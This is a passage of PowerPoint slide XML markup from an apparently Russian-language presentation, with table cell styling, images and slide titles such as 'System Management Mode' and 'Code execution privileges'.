                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731877" y="2754124"/>
            <a:ext cx="4945775" cy="35843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332" name="Shape 332"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501640" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2300" lvl="0" marL="396000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>System Management Mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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339" name="Shape 339"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="822240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Code execution privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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342" name="Shape 342"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2462543" y="1452491"/>
            <a:ext cx="7372570" cy="466600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Другая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76B72A"/>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